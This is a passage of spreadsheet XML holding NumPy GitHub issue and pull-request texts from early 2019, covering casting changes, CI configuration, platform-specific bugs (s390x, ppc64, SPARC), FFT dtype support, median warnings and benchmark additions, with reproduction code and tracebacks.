    In [5]: np.ediff1d(x, to_begin=[-99], to_end=[99])_x000D_
    ..._x000D_
    TypeError: dtype of to_begin must be compatible with input ary_x000D_
_x000D_
    In [6]: np.ediff1d(x, to_begin=-99, to_end=99)_x000D_
    Out[6]: array([-99,   1,   2,   3,  -7,  99], dtype=int32)_x000D_
_x000D_
These last two are both entirely safe and valid code even if they are going through an int64 to int32 cast; the value -99 is preserved in that transformation._x000D_
_x000D_
At RC2 stage, I assume that this change is not going to be reverted even if it does break some valid existing code. It would be handy to see this in the release notes and in the `ediff1d` documentation so that those dealing with failing tests have a useful pointer. The key information to include is:_x000D_
_x000D_
  * if single values are being passed to `to_begin` or `to_end` then pass them as values not lists or arrays_x000D_
  * if the input array is a narrowed dtype, be explicit about the dtype of the prepended/appended data._x000D_
_x000D_
I'd be happy to give you a PR to do that if you want._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
    1.12.1 3.5.3 (default, Sep 27 2018, 17:25:39) _x000D_
    [GCC 6.3.0 20170516]_x000D_
_x000D_
vs_x000D_
_x000D_
    1.16.0rc2 3.7.2 (default, Jan  3 2019, 02:55:40) _x000D_
    [GCC 8.2.0]_x000D_
_x000D_
(all from Debian packages)</t>
  </si>
  <si>
    <t>Noting ediff1d casting changes in release notes, docs?</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12704._x000D_
_x000D_
Recent PRs (i.e., #12702 ) are showing Azure CI failures related to homebrew failing to update itself before it tries to install gcc (so that gfortran is available)._x000D_
_x000D_
This PR prevents the (default behavior) homebrew self-update and seems to install gcc in a stable manner for now._x000D_
_x000D_
In the future this command will probably evolve to pin to a specific version of gcc to match the wheels workflow as the gcc 8.x toolchain for gfortran is far newer than we should need. But mac OS azure compiles with clang and doesn't use openblas for now anyway._x000D_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</si>
  <si>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pin Azure brew version for stability.</t>
  </si>
  <si>
    <t>Add `ppc64le` Linux testing to Travis CI. Part of the effort in #12688._x000D_
_x000D_
I don't have Travis hooks active on my fork, so this WIP CI testing / dev could get annoying, but I'll start working on this here for now, for convenience._x000D_
_x000D_
Related template: https://github.com/ghatwala/travis-jobdeploytest/blob/master/.travis.yml</t>
  </si>
  <si>
    <t>TST: add ppc64le to Travis CI matrix</t>
  </si>
  <si>
    <t>Fixes one of the three failing SPARC tests in #12638.</t>
  </si>
  <si>
    <t>TST: Fix endianness in unstuctured_to_structured test</t>
  </si>
  <si>
    <t xml:space="preserve">This is for the _selected_real_kind_func function in_x000D_
f2py/crackfortran.py. See #12638._x000D_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</si>
  <si>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Add 'sparc' to platforms implementing 16 byte reals.</t>
  </si>
  <si>
    <t>A few more fixes following on #12626, based on testing on a ppc64be system._x000D_
_x000D_
First, on this system some einsum tests failed due typo in that PR: `;` should have been `&amp;&amp;`. This wasn't caught by x64 unit tests, so I've added a test that should cover those code paths._x000D_
_x000D_
Second, I figured out that some of the fix in #12626 wasn't quite right: I had misunderstood what the `NPY_ITER_ALIGNED` flag is supposed to do. My understanding now is that is a request to guarantee that the nditer buffers are "true" aligned. (uint alignment is only an internal numpy thing which users shouldn't know about), which nditer it does by forcing a buffer/cast if that flag is requested, since all new buffers are true aligned. With that understanding, it now seems that the `NPY_OP_ITFLAG_ALIGNED` flag is not needed: Its only use was as a precalculated computation of the `aligned` parameter of `PyArray_GetDTypeTransferFunction`, but that is more safely computed on the spot, based on both uint and true alignment of the op. So I've removed all uses of `NPY_OP_ITFLAG_ALIGNED`._x000D_
_x000D_
This latter change was indirectly discovered from staring at the code while trying to bug-hunt failed alignment asserts on ppc64be. But those turned out to be irrelevant glibc problems from #10491. At least it got me to read a lot of code over more thoroughly: I also made sure that the ufunc code doesn't need alignment fixes.</t>
  </si>
  <si>
    <t>MAINT: Further fixups to uint alignment checks</t>
  </si>
  <si>
    <t>Cleaning up SciPy doc builds in https://github.com/scipy/scipy/pull/9623 I hit warnings/errors like:_x000D_
```_x000D_
scipy/doc/source/tutorial/linalg.rst:21: WARNING: py:obj reference target not found: numpy.linalg_x000D_
scipy/doc/source/tutorial/stats.rst:161: WARNING: py:mod reference target not found: numpy.random_x000D_
```_x000D_
This is because there are several submodules/namespaces without proper intersphinx links. This adds the ones I could find via looking at `git grep "currentmodule"` to see what modules are used internally during NumPy documentation. (This also caught the two I needed for SciPy, namely `linalg` and `random`. Submodules documented with `automodule` do not suffer from this problem because automodule takes care of adding the links.) You can see that they show up in `objects.inv` after doing a new build with `python -msphinx.ext.intersphinx build/html/objects.inv`:_x000D_
```_x000D_
py:module_x000D_
	..._x000D_
	numpy.linalg                             reference/routines.linalg.html#module-numpy.linalg_x000D_
	..._x000D_
```</t>
  </si>
  <si>
    <t>ENH: Better links in documentation</t>
  </si>
  <si>
    <t>Recent PRs (i.e., #12702 ) are showing Azure CI failures related to homebrew failing to update itself before it tries to install `gcc` (so that `gfortran` is available)._x000D_
_x000D_
This PR prevents the (default behavior) homebrew self-update and seems to install gcc in a stable manner for now._x000D_
_x000D_
In the future this command will probably evolve to pin to a specific version of gcc to match the wheels workflow as the gcc 8.x toolchain for gfortran is far newer than we should need. But mac OS azure compiles with clang and doesn't use openblas for now anyway.</t>
  </si>
  <si>
    <t>TST: pin Azure brew version for stability</t>
  </si>
  <si>
    <t>Closes #12460 _x000D_
_x000D_
This adds a non regression test to ensure that FFT/IFFT results are identical for C, Fotran ordered and non contigous arrays. This is in particular, relevant if other FFT backends are used._x000D_
_x000D_
Test adapted from https://github.com/numpy/numpy/issues/12460#issuecomment-452045427</t>
  </si>
  <si>
    <t>TST: Check FFT results for C/Fortran ordered and non contigous input</t>
  </si>
  <si>
    <t>Fixes #7961. Adds an additional exception to the exception chain when calling the object method fails (only for object inner loops).</t>
  </si>
  <si>
    <t>ENH: chain additional exception on ufunc method lookup error</t>
  </si>
  <si>
    <t xml:space="preserve">Followup to #12677, to improve comment documentation for this new function._x000D_
</t>
  </si>
  <si>
    <t>DOC: improve comments in copycast_isaligned</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
The kind of a standalone dtype that contains shape information is set to "V" instead of the expected kind._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
dt = np.dtype("(2,)f8")_x000D_
print(dt.kind) # "V"_x000D_
_x000D_
arr = np.array([], dtype="(2,)f8")_x000D_
print(arr.dtype.kind) # "f"_x000D_
```_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.15.4 3.7.0 (v3.7.0:1bf9cc5093, Jun 27 2018, 04:59:51) [MSC v.1914 64 bit (AMD64)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>standalone dtype kind set to "V" for shaped dtypes</t>
  </si>
  <si>
    <t>['component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">Related to gh-9436 (pinging @perimosocordiae)_x000D_
_x000D_
An alternative to #12665 with a lower maintenance burden (cc @jordan-melendez), although admittedly with some small sign-juggling overhead._x000D_
_x000D_
Runs in 60% of the time of the non-hermitian version for a mid-size test:_x000D_
```python_x000D_
In [1]: a = np.random.random((300, 300))_x000D_
_x000D_
In [2]: a = a.T @ a_x000D_
_x000D_
In [3]: %timeit np.linalg.svd(a)_x000D_
287 ms ± 21.4 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)_x000D_
_x000D_
In [4]: %timeit np.linalg.svd(a, hermitian=1)_x000D_
168 ms ± 12 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)_x000D_
``_x000D_
</t>
  </si>
  <si>
    <t>ENH: Add a hermitian argument to `pinv` and `svd`, matching `matrix_rank`</t>
  </si>
  <si>
    <t xml:space="preserve">Second step in #12662._x000D_
_x000D_
Because it is a new function and someone else's "vision" it will almost certainly need some revisions so adding WIP tag for now though tests pass locally._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>WIP, ENH: add _nan_mask function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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import numpy as np_x000D_
tensor = np.random.rand(10, 10, 10, 10)_x000D_
np.einsum('ijij-&gt;', tensor)_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/einsumfunc.py", line 1346, in einsum_x000D_
    return c_einsum(*operands, **kwargs)_x000D_
ValueError: dimensions in operand 0 for collapsing index 'þ' don't match (19228356 != 10)_x000D_
```_x000D_
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Debian unstable on s390x _x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
```_x000D_
1.16.0rc2 3.7.2 (default, Jan  3 2019, 02:55:40) _x000D_
[GCC 8.2.0]_x000D_
```_x000D_
_x000D_
I could not reproduce this on Debian stable (numpy 1.12.1), but 1.15 seems to be affected as well._x000D_
_x000D_
So if I add `print(tensor[0][0][0])` before the  `np.einsum` it runs fine:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; tensor = np.random.rand(10, 10, 10, 10)_x000D_
&gt;&gt;&gt; print(tensor[0][0][0])_x000D_
[0.56143868 0.22681118 0.47354192 0.27676805 0.09566204 0.63877983_x000D_
 0.4243805  0.91690097 0.2695863  0.28861963]_x000D_
&gt;&gt;&gt; np.einsum('ijij-&gt;', tensor)_x000D_
51.05293277361482_x000D_
```_x000D_
_x000D_
Also see https://github.com/psi4/psi4/issues/1465 where this bug originated for some more debugging output that might be helpful._x000D_
_x000D_
Note that on s390x, a `char` is `unsigned char` unless specified otherwise, contrary to x86 architectures._x000D_
</t>
  </si>
  <si>
    <t>einsum error for mixed subscripts on s390x</t>
  </si>
  <si>
    <t>Progress / tracking issue following a conference call today with @ipoddar-ibm from IBM along with @stefanv &amp; @mattip regarding dev access to POWER arch machines as well as adding `numpy/numpy` to Travis CI runs that use genuine POWER arch / hardware (presumably ppc64le Linux instead of i.e., emulation)._x000D_
_x000D_
For reference, @mattip provided some [open AIX issues](https://github.com/numpy/numpy/issues?utf8=%E2%9C%93&amp;q=is%3Aissue+is%3Aopen+aix) and [open powerpc issues](https://github.com/numpy/numpy/issues?utf8=%E2%9C%93&amp;q=is%3Aissue+is%3Aopen+powerpc).</t>
  </si>
  <si>
    <t>Tracking Issue for ppc64 continuous integration</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: fix #12663 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Make pocketfft handle long doubles.</t>
  </si>
  <si>
    <t>Fixes #12682 by removing the private `_arg` ufunc used for testing from the public API and adding `matmul` to the list of ufuncs in `bench_ufuncs`</t>
  </si>
  <si>
    <t>DEV: remove _arg from public API, add matmul to benchmark ufuncs</t>
  </si>
  <si>
    <t>['16 - Development', '28 - Benchmark']</t>
  </si>
  <si>
    <t>~This still needs work -- something isn't quite right according to the unit tests.~_x000D_
_x000D_
Would be nice if an inner loop that performs the operations of two other inner loops could just gracefully call the those other two inner loops, but I think Eric &amp; I have had that discussion before &amp; there are issues with i.e., nesting binop loops.</t>
  </si>
  <si>
    <t>ENH: add mm-&gt;qm divmod</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t>When running benchmarks, a warning appears (see https://github.com/numpy/numpy/pull/12666#issuecomment-451790069) that_x000D_
```_x000D_
[  0.00%] ···· Missing ufunc '_arg'                                                                                                                                                                                                                  _x000D_
               Missing ufunc 'matmul'      _x000D_
```_x000D_
This originates on_x000D_
https://github.com/numpy/numpy/blob/master/benchmarks/benchmarks/bench_ufunc.py#L25_x000D_
_x000D_
I think `matmul` may well be tested elsewhere, so can be excluded here. `np.core.umath_arg.__doc__` suggests `_arg` is for testing purposes only; am not sure why it is exported.</t>
  </si>
  <si>
    <t>UFunc benchmarks complaining lack of coverage of matmul and _arg</t>
  </si>
  <si>
    <t>['00 - Bug', '28 - Benchmark', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Fixes #12676 by removing the `Invalid value` warning from `median`, `percentile` and `quantile`</t>
  </si>
  <si>
    <t>ENH: remove "Invalid value" warnings from median, percentile</t>
  </si>
  <si>
    <t xml:space="preserve">This is causing sporadic test failures with current OpenBLAS_x000D_
on i386, seen when building numpy wheels. See https://travis-ci.org/MacPython/numpy-wheels/jobs/475784943 for an example._x000D_
_x000D_
I am not convinced that this is the right thing to do, this may very well be an OpenBLAS problem for that architecture, but I'm putting it up for discussion. In particular, the fact that it is sporadic is suspicious, and I don't see how that comes about unless something non-deterministic is going on. Note that on 64 bits using the csingle as in the tests, the errors are an order of magnitude less._x000D_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</si>
  <si>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Loosen tolerance for TestPinv complex64.</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>The problem is that `median` would produce `RuntimeWarning` with the `Invalid value encountered in median for 2 results` message, while `mean` is silent about it.  Why?_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.array([[1, 4, 3, np.nan], [2, 5, np.nan, 4]])_x000D_
m = mean(a, axis=1)_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.15.4 3.7.1 (default, Oct 22 2018, 10:41:28) _x000D_
[GCC 8.2.1 20180831]_x000D_
```</t>
  </si>
  <si>
    <t>ENH: `median` should not warn about invalid values</t>
  </si>
  <si>
    <t>The code is pretty clear below.  The main problem that I have with this, is the fact that `median` works fine in this scenario.  To me that looks as an inconsistent implementation._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.ones((5, 4, 3)) * np.arange(5)[:, np.newaxis, np.newaxis]_x000D_
np.mean(a, axis=np.array([1, 2]), keepdims=True)_x000D_
```_x000D_
_x000D_
```_x000D_
.venv/lib/python3.7/site-packages/numpy/core/fromnumeric.py:2920: in mean_x000D_
    out=out, **kwargs)_x000D_
.venv/lib/python3.7/site-packages/numpy/core/_methods.py:62: in _mean_x000D_
    rcount = _count_reduce_items(arr, axis)_x000D_
_x000D_
arr = array([[[0., 0., 0.],_x000D_
        [0., 0., 0.],_x000D_
        [0., 0., 0.],_x000D_
        [0., 0., 0.]],_x000D_
_x000D_
       [[1., 1., 1.],_x000D_
      ... 3.],_x000D_
        [3., 3., 3.]],_x000D_
_x000D_
       [[4., 4., 4.],_x000D_
        [4., 4., 4.],_x000D_
        [4., 4., 4.],_x000D_
        [4., 4., 4.]]])_x000D_
_x000D_
axis = (array([1, 2]),)_x000D_
    def _count_reduce_items(arr, axis):_x000D_
        if axis is None:_x000D_
            axis = tuple(range(arr.ndim))_x000D_
        if not isinstance(axis, tuple):_x000D_
            axis = (axis,)_x000D_
        items = 1_x000D_
        for ax in axis:_x000D_
&gt;           items *= arr.shape[ax]_x000D_
E           TypeError: only integer scalar arrays can be converted to a scalar index_x000D_
_x000D_
.venv/lib/python3.7/site-packages/numpy/core/_methods.py:55: TypeError_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.15.4 3.7.1 (default, Oct 22 2018, 10:41:28) _x000D_
[GCC 8.2.1 20180831]_x000D_
```</t>
  </si>
  <si>
    <t>TypeError: only integer scalar arrays can be converted to a scalar index</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
UnicodeDecodeError occurred when accessing an item assigned from another numpy array item. I dont know if this is made by design _x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; strA = np.array([('aa', 2),('bb', 4)], dtype=[('c1', 'U2'), ('c2', 'i4')])_x000D_
&gt;&gt;&gt; strA['c1'][0]_x000D_
'aa'_x000D_
&gt;&gt;&gt; strA['c1'] = strA['c1'][0]_x000D_
&gt;&gt;&gt; strA['c1'][0]_x000D_
UnicodeDecodeError: 'utf-32-le' codec can't decode bytes in position 0-3: code point not in range(0x110000)_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
UnicodeDecodeError: 'utf-32-le' codec can't decode bytes in position 0-3: code point not in range(0x110000)_x000D_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python 3.6.5 _x000D_
numpy 1.14.3 and 1.15.4_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Problem to accessing column items assigned from single numpy.str_ value in structured array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Element-wise addition, subtraction, multiplication, and division are almost 10x slower in 1.15 than in 1.11.3. This appears true only for the first execution of the below script. In subsequent executions, 1.15 seems faster - however in production we are seeing the slower performance of 1.15 all the time (i.e., it never "warms up"). Is this a caching issue or something of that nature?_x000D_
_x000D_
### Reproducing code example:_x000D_
1. create a conda environment with numpy 1.11.3 thus:_x000D_
    ```sh_x000D_
    conda create -n np1113py352 python=3.5.2 numpy=1.11.3_x000D_
     ```_x000D_
2. create a second environment with 1.15 thus_x000D_
    ```sh_x000D_
    conda create -n np115py352 python=3.5.2 numpy=1.15_x000D_
    ```_x000D_
3. Run operators with the following script in both environments and observe that first execution is much slower in the 1.15 environment_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import argparse_x000D_
import sys_x000D_
import time_x000D_
import numpy as np_x000D_
_x000D_
def time_op(op):_x000D_
    a1 = np.random.rand(512, 512)_x000D_
    a2 = np.random.rand(512, 512)_x000D_
    start = time.perf_counter()_x000D_
    exec('a1 {} a2'.format(args.op))_x000D_
    end = time.perf_counter()_x000D_
    return end - start_x000D_
_x000D_
if __name__ == '__main__':_x000D_
    parser = argparse.ArgumentParser()_x000D_
    parser.add_argument("op")_x000D_
    parser.add_argument("repeats", default=1, type=int, nargs='?')_x000D_
    args = parser.parse_args()_x000D_
    results = [time_op(args.op) for i in range(args.repeats)]_x000D_
    print("Mean: {}".format(np.mean(results)))_x000D_
    print("All Results:\n{}".format(results))_x000D_
```_x000D_
_x000D_
**Expected Output**_x000D_
_x000D_
```sh_x000D_
&gt; source activate np1113py352_x000D_
(np1113py352) &gt; python time_numpy_op.py -_x000D_
Mean: 0.0011733369901776314_x000D_
All Results:_x000D_
[0.0011733369901776314]_x000D_
(np1113py352) &gt; source deactivate_x000D_
&gt; source activate np115py352_x000D_
(np115py352) &gt; python time_numpy_op.py -_x000D_
Mean: 0.019282180990558118_x000D_
All Results:_x000D_
[0.019282180990558118]_x000D_
(np115py352) i&gt; source deactivate_x000D_
&gt; source activate np1113py352_x000D_
(np1113py352) &gt; python time_numpy_op.py - 10_x000D_
Mean: 0.0008086999965598807_x000D_
All Results:_x000D_
[0.0009474630060140043, 0.000974412017967552, 0.0009397219982929528, 0.0008637550054118037, 0.0009213250013999641, 0.0008586559852119535, 0.0007832369883544743, 0.0006015869730617851, 0.0006042780005373061, 0.0005925649893470109]_x000D_
(np1113py352) &gt; source deactivate_x000D_
&gt; source activate np115py352_x000D_
(np115py352) &gt; python time_numpy_op.py - 10_x000D_
Mean: 0.0025311258970759807_x000D_
All Results:_x000D_
[0.02195357100572437, 0.0006182210054248571, 0.00038990401662886143, 0.0003395449894014746, 0.0003235509793739766, 0.0003280279925093055, 0.00033088400959968567, 0.00032537899096496403, 0.00035402498906478286, 0.00034815099206753075]_x000D_
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N/A_x000D_
_x000D_
### Numpy/Python version information:_x000D_
**Numpy:** 1.11.3 / 1.15.2 (both installed via conda)_x000D_
**Python:** 3.5.2 (installed via conda)_x000D_
_x000D_
**Other Info:**_x000D_
**OS:** SLES 12.2_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Element-wise operators 10x slower in 1.15 than in 1.11</t>
  </si>
  <si>
    <t xml:space="preserve">... by including the indices and shapes of the arrays whose shape_x000D_
differ._x000D_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</si>
  <si>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Improve error messages for non-matching shapes in concatenate.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I'm not sure if it is an error of numpy or python, but when using Python 3.7 from the Windows store, importing numpy fails with "DLL load failed". Even though there are already many quite similar issues, I never found that issue in combination with a fresh python installation (from the Microsoft Store)._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```pip install numpy```_x000D_
```python_x000D_
import numpy_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "C:\Users\stroy\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.7_qbz5n2kfra8p0\LocalCache\local-packages\Python37\site-packages\numpy\core\__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
ImportError: DLL load failed: Das angegebene Modul wurde nicht gefunden._x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "C:\Users\stroy\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.7_qbz5n2kfra8p0\LocalCache\local-packages\Python37\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import add_newdocs_x000D_
  File "C:\Users\stroy\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.7_qbz5n2kfra8p0\LocalCache\local-packages\Python37\site-packages\numpy\add_newdocs.py", line 13, in &lt;module&gt;_x000D_
    from numpy.lib import add_newdoc_x000D_
  File "C:\Users\stroy\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.7_qbz5n2kfra8p0\LocalCache\local-packages\Python37\site-packages\numpy\lib\__init__.py", line 8, in &lt;module&gt;_x000D_
    from .type_check import *_x000D_
  File "C:\Users\stroy\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.7_qbz5n2kfra8p0\LocalCache\local-packages\Python37\site-packages\numpy\lib\type_check.py", line 11, in &lt;module&gt;_x000D_
    import numpy.core.numeric as _nx_x000D_
  File "C:\Users\stroy\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.7_qbz5n2kfra8p0\LocalCache\local-packages\Python37\site-packages\numpy\core\__init__.py", line 26, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_
Importing the multiarray numpy extension module failed.  Most_x000D_
likely you are trying to import a failed build of numpy._x000D_
If you're working with a numpy git repo, try `git clean -xdf` (removes all_x000D_
files not under version control).  Otherwise reinstall numpy._x000D_
_x000D_
Original error was: DLL load failed: Das angegebene Modul wurde nicht gefunden._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
Python 3.7.2 (v3.7.2:9a3ffc0492, Dec 23 2018, 23:19:17) [MSC v.1916 64 bit (AMD64)]_x000D_
Numpy 1.15.4_x000D_
</t>
  </si>
  <si>
    <t>BUG: Python from windows 10 store does not extend PATH via numpy.__config__.py</t>
  </si>
  <si>
    <t xml:space="preserve">First step in #12662 _x000D_
_x000D_
Sample local test command and results:_x000D_
`asv run -e -b "Nan" &gt;&amp; benchresults.txt` _x000D_
[benchresults.txt](https://github.com/numpy/numpy/files/2728740/benchresults.txt)_x000D_
_x000D_
Two things that seem suspicious about those local results:_x000D_
- long (500+ seconds) timings sometimes reported when the entire suite actually runs in just a few seconds (display issue or something else?)_x000D_
 _x000D_
&amp;_x000D_
_x000D_
```_x000D_
[  0.00%] ··· Importing benchmark suite produced output:_x000D_
[  0.00%] ···· Missing ufunc '_arg'                                                                                                                                                                                                                  _x000D_
               Missing ufunc 'matmul'      _x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BENCH: add asv nanfunction benchmarks</t>
  </si>
  <si>
    <t>&lt;!--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This is a faster version of `linalg.pinv` for Hermitian matrices. It is like the Scipy version of `pinvh`, but supports stacked matrices like Numpy's `pinv`.</t>
  </si>
  <si>
    <t>ENH: Add a pinvh function to linalg.</t>
  </si>
  <si>
    <t xml:space="preserve">FFT fails for signals of float128, complex256 dtypes, which used to work in older numpies (checked with 1.12.1)_x000D_
_x000D_
```_x000D_
In [2]: np.__version__                                                          _x000D_
Out[2]: '1.17.0.dev0+4ba4f9b'_x000D_
_x000D_
In [3]: a = np.ones(8, dtype=np.float128)                                       _x000D_
_x000D_
In [4]: np.fft.fft(a)                                                           _x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-4-e0cb4dbe8081&gt; in &lt;module&gt;_x000D_
----&gt; 1 np.fft.fft(a)_x000D_
_x000D_
~/repos/numpy/build/testenv/lib/python3.5/site-packages/numpy/fft/pocketfft.py in fft(a, n, axis, norm)_x000D_
    182     if norm is not None and _unitary(norm):_x000D_
    183         fct = 1 / sqrt(n)_x000D_
--&gt; 184     output = _raw_fft(a, n, axis, False, True, fct)_x000D_
    185     return output_x000D_
    186 _x000D_
_x000D_
~/repos/numpy/build/testenv/lib/python3.5/site-packages/numpy/fft/pocketfft.py in _raw_fft(a, n, axis, is_real, is_forward, fct)_x000D_
     69 _x000D_
     70     if axis == a.ndim-1:_x000D_
---&gt; 71         r = pfi.execute(a, is_real, is_forward, fct)_x000D_
     72     else:_x000D_
     73         a = swapaxes(a, axis, -1)_x000D_
_x000D_
TypeError: Cannot cast array data from dtype('float128') to dtype('complex128') according to the rule 'safe'_x000D_
```_x000D_
_x000D_
Observed in scipy CI: https://travis-ci.org/scipy/scipy/jobs/475388871._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>FFT transforms no longer handle float128 arrays</t>
  </si>
  <si>
    <t xml:space="preserve">Reductions have gained a `where` keyword, which means that things like `nansum` can now be implemented more trivially as `np.sum(a, where=~np.isnan(a))`. This is faster than the current `nansum` implementation, which has to make a copy of `a` and then set elements of it to 0. It is a fairly straightforward change, but I'm raising the issue here rather than doing it as I don't quite have time for it myself. Specifically, what I think should be done is_x000D_
_x000D_
1. [X] Add nanfunction benchmarks to `numpy/benchmarks/benchmarks`, for a range of conditions (small &amp; large array; no `nan`, few `nan`, many `nan`). (EDIT: done in #12666)_x000D_
2. [X] Implement a new `_nan_mask` function which returns `True` for dtype that do not have `nan` (integer, etc.), and `~np.isnan(array)` (or perhaps better `m = np.isnan(array); m = np.invert(m, out=m)`)._x000D_
3. [ ] Replace `nansum`, etc., with something like `np.sum(array, where=_nan_mask(array))`, checking that timings actually improve._x000D_
</t>
  </si>
  <si>
    <t>Use reductions with where for nanfunctions</t>
  </si>
  <si>
    <t xml:space="preserve">Replaces PR #12630 after comments there._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>WIP, NEP: add dtype design NEP - DtypeMeta, Dtype, and hierarchy</t>
  </si>
  <si>
    <t>I'm not sure if this should be a numpy issue or an issue with the relevant packages, but it is affecting multiple. So far I've seen it with pyhdf/0.9.0, and pynio/1.4.0. Basically, if I try to build these packages with a Python 2.7.15 install and numpy/1.16.0rc1, the builds fail at different steps because of compiler/linker errors. I'll document the pyhdf case only, for simplicity. In the pyhdf setup.py file, they have a line that goes:_x000D_
_x000D_
extra_link_args = os.environ.get('LINK_ARGS', '')_x000D_
_x000D_
This extra_link_args gets put into a list and then sent as extra_link_args to distutils. In older versions of numpy, everything works, but in the latest, gcc (v7.3.0) gives the following error:_x000D_
_x000D_
gcc: error: : No such file or directory_x000D_
_x000D_
After some digging, I tracked down the issue to the older version (1.15.4) using the "exec_command" function, which will send the string-joined command to the shell if in a POSIX environment. As a result, the empty string scenario (no LINK_ARGS value) is harmless. In the new version, subprocess.check_output is used with no shell option, and so the empty string remains a list element and it send to gcc as arg, which causes it to fail. This behavior was introduced in 83b0340._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
To reproduce, attempt to install pyhdf/0.9.0 from source using a Python install with numpy/1.16.0rc1:_x000D_
_x000D_
python setup.py install_x000D_
_x000D_
I am using gcc/7.3.0 on CentOS 7._x000D_
_x000D_
### Error message:_x000D_
_x000D_
gcc: error: : No such file or directory                                                                                                                                                      error: Command "gcc -pthread -shared -Wl,-rpath,/glade/u/apps/dav/opt/hdf/4.2.14/gnu/7.3.0/lib build/temp.linux-x86_64-2.7/pyhdf/hdfext_wrap.o -L/glade/u/apps/dav/opt/hdf/4.2.14/gnu/7.3.0/l_x000D_
ib -lmfhdf -ldf -ljpeg -lz -o build/lib.linux-x86_64-2.7/pyhdf/_hdfext.so " failed with exit status 1_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
('1.16.0rc1', '2.7.15 (default, Jan  3 2019, 11:15:38) \n[GCC 7.3.0]')</t>
  </si>
  <si>
    <t>Some package builds fail with 1.16.0rc1 distutils</t>
  </si>
  <si>
    <t>[ci skip]_x000D_
_x000D_
Update copyright year to 2019</t>
  </si>
  <si>
    <t>DOC: update 2018 -&gt; 2019</t>
  </si>
  <si>
    <t>The benchmark suite should be importable with any historical Numpy version we are likely to benchmark.</t>
  </si>
  <si>
    <t>BENCH: don't fail at import time with old Numpy</t>
  </si>
  <si>
